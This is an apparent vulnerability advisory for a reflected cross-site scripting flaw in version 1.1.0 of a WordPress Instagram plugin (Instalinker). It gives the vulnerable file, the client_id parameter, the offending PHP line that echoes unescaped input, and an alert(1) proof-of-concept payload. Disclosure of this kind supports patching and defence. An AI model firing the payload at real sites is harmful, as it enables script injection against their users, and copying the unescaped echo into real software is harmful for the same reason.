WordPress Instagram 1.1.0 suffers from a cross site scripting vulnerability.
b415a90ab2064dc918dbe4d97abaea9e9a91595f762c6ff138e61c114a50ae71
######################
# Exploit Title : WordPress Instagram Plugin 1.1.0 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/
# Software Link : https://wordpress.org/plugins/instalinker/
# Date: 2016/02/04
# Version : 1.1.0
######################
#
# Vulnerable code :
# File Name: instalinker-admin-preview.php
# instalinker/includes/instalinker-admin-preview.php?client_id=[XSS]
# Payload : "><script>alert(1)</script>
# Found at line 17 :
# <?php echo !empty($_GET['client_id']) ? 'data-il-client-id="' . $_GET['client_id'] . '"' : ""; ?>
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################